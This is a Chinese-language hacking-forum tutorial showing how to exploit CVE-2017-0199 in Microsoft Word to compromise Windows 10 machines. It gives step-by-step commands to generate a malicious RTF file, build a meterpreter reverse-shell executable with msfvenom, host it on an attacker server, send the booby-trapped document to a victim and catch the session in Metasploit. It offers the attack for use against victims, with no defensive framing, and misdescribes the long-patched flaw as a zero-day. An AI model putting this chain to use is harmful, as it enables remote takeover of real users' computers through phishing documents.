利用微软的rtf文件攻击Windows10(Exploit toolkit CVE-2017-0199)

weiweihack
3920weiweihack首席执行运营官
2018-11-14 23:46:53
3920 2018-11-14 23:46:53
Microsoft word很容易受到恶意RTF文件的侵害,在本文中我们使用python脚本对MS-word 2013进行了零日攻击,这将生成恶意的.rtf文件,并将给出目标系统的预备会话(meterpreter session)。
Exploit toolkit CVE-2017-0199 - v2.0是一个方便的python脚本(目前更新到了4.0),它提供了一种快速有效的方法来利用Microsoft RTF RCE。它可以生成恶意RTF文件,它将向受害者提供metasploit / meterpreter /任何其他有效负载,而无需任何复杂的配置。
开始吧!!!
攻击者:Kali Linux
目标:Windows 10( Microsoft Word 2007 - 2013
打开Kali Linux内的终端并输入以下内容。
git clone https://github.com/bhdresh/CVE-2017-0199.git

描述:利用微软的rtf文件攻击Windows10


cd CVE-2017-0199
python cve-2017-0199_toolkit.py -M gen -w sales.rtf -u http://192.168.1.24/raj.doc
此命令将运行Python脚本以生成一个丰富的文本格式payload ,其中--m用于生成RTF文件--W用于RTF文件的名称,即“sals.rtf”和--U用于攻击者的ip地址或域名。
利用微软的rtf文件攻击Windows10

描述:利用微软的rtf文件攻击Windows10


正如您在给定的屏幕截图中可以看出,上面的命令已生成恶意sales .rtf文件,现在我们将此文件发送给受害者之前,我们需要将其与任何后门文件连接,以便我们可以与受害者建立反向连接。

描述:利用微软的rtf文件攻击Windows10


在新终端上使用msfvenom为攻击准备exe有效负载并键入以下内容。
msfvenom –p windows/meterpreter/reverse_tcp lhost=192.168.1.24 lport=4444 –f exe > /root/Desktop/raj.exe

描述:利用微软的rtf文件攻击Windows10


现在将raj.exe移动到/ var / www / html中。

描述:利用微软的rtf文件攻击Windows10


现在键入以下命令,它将raj.exe与sales.rtf合并。然后你必须与受害者共享更新的rtf文件并同时启动多个处理程序以反向连接受害者。
python cve-2017-0199_toolkit.py -M exp -e http://192.168.1.24/raj.exe -l /var/www/html/raj.exe

描述:利用微软的rtf文件攻击Windows10


当受害者将打开文件时,将以doc格式同时攻击者将在metaspolit框架内接收他的meterpreter会话。
msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.24
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit
meterpreter > sysinfo

描述:利用微软的rtf文件攻击Windows10


本文标题:利用微软的rtf文件攻击Windows10(Exploit toolkit CVE-2017-0199)
本文作者:weiweihack
本文来自:蚁安黑客官网
转载请注明本文链接:http://www.mayidui.net/t2422.html
游客
登录后才可以回帖,登录 或者 注册
weixin
蚁安蚂蚁堆

找工具、找教程、找朋友,你想不到的这儿都有!

微信号:baiyiwangan